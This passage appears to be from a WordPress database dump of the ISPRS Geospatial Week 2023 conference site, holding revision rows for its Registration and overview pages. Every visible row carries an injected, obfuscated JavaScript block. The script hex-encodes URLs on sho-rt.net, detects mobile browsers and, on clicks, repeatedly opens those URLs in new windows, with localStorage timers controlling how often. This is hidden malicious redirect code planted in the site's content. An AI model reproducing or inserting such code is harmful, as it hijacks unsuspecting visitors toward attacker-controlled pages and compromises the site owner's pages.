_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-05 08:29:19','2023-02-05 08:29:19','',2638,'https://gsw2023.com/?p=3781',0,'revision','',0),
(3782,1,'2023-02-05 08:33:34','2023-02-05 08:33:34','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</span></p>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></span></p>\n<h5 class=\"gap-10\"></h5>\n<ul class=\"nospace\">\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</span></p>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-05 08:33:34','2023-02-05 08:33:34','',2631,'https://gsw2023.com/?p=3782',0,'revision','',0),
(3783,1,'2023-02-05 08:35:15','2023-02-05 08:35:15','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</span></p>\r\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</span></p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></span></p>\r\n\r\n<h5 class=\"gap-10\"></h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</span></p>\r\n</li>\r\n 	<li>\r\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</span></p>\r\n</li>\r\n 	<li>\r\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</span></p>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 